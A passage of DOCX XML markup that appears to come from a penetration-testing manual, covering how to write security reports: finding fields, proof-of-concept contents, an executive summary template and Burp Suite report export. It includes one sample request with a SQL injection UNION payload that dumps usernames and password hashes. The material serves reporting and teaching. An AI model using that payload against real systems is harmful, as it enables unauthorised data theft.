          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00A6FF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Content</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Severity</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CRITICAL / HIGH / MEDIUM / LOW / INFORMATIONAL (with CVSS base score)</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CVSS Vector</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Full CVSS:3.1 vector string — e.g. CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L</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CVSS Score</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Numeric score — e.g. 9.4</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CVE Reference</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CVE ID if applicable — e.g. CVE-2012-2122 (or 'N/A - Novel Finding')</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CWE Reference</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CWE ID and name — e.g. CWE-89: Improper Neutralisation of SQL Commands</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OWASP Category</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Mapped OWASP Top 10 category — e.g. A03:2021 — Injection</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Affected URL</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Full URL of the vulnerable endpoint</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Affected Parameter</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Specific parameter — e.g. q, username, token</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Description</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Explain what the vulnerability is and why it exists. Non-technical language</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Business Impact</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What an attacker could realistically do. Business consequences: data breach, financial loss, regulatory</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Proof of Concept</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Exact request/response demonstrating exploitation. Reproducible steps.</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Evidence</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Screenshot or copied request showing successful exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="240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onsolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7FDBFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:left w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:bottom w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:right w:val="single" w:color="1E3A5F" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="060F1C" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="C8D8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Specific technical fix: parameterised queries, input validation, header changes, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="240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onsolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7FDBFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">References</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:left w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:bottom w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:right w:val="single" w:color="1E3A5F" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="030A14" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="C8D8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP Testing Guide link, PortSwigger Academy, CVE/NVD link, vendor advisory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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6.3  Proof of Concept — What to Include</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The PoC must allow the developer to reproduce the issue. Include:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Full HTTP request (copy from Burp Repeater)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Full HTTP response showing successful exploitation (or Collaborator interaction log)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Scanner issue detail export (XML)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step-by-step numbered reproduction steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot annotated with red boxes highlighting the key evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload used, exactly as submitted</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ PoC Request Example Format</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  Request:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  POST /api/v1/search HTTP/2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  Host: targetcorp.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  Content-Type: application/json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  Authorization: Bearer eyJhbGci...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  {"q":"' UNION SELECT null,username,password FROM users--"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  Response:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  HTTP/2 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  Content-Type: application/json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  {"results":[{"username":"admin","password":"5f4dcc3b5aa765d61d8327deb882cf99"}]}</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6.4  Executive Summary — Writing for Non-Technical Audiences</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The executive summary is read by C-suite and board members. It must answer three questions without technical jargon:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">What did we find? — Number of findings by severity. Overall risk: Critical/High/Medium/Low</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Why does it matter? — Business impact in terms of data, money, reputation, regulation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">What do we do? — Top 3–5 prioritised recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Executive Summary Template</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="0" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="446688"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  // Template — replace with engagement-specific details</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  PortSwigger Consulting conducted a web application penetration test of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  [Client Name]'s [Application Name] between [Date] and [Date].</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  The assessment identified [N] security vulnerabilities across [N] severity levels:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    Critical: [N]   High: [N]   Medium: [N]   Low: [N]   Informational: [N]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  The most significant finding — [Finding Name] — would allow an</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  unauthenticated attacker to [business impact statement]. This represents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  a [regulatory/financial/reputational] risk to the organisation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  We recommend the following immediate actions:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    1. [Critical fix 1]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    2. [Critical fix 2]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    3. [High fix 1]</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6.5  Generating Reports from Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Burp Built-in Report Generator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Target → Site Map → right-click scope → Issues → Report Issues</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Select format: HTML or XML</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Select severity levels to include</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Select which detail sections: background, remediation, request/response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
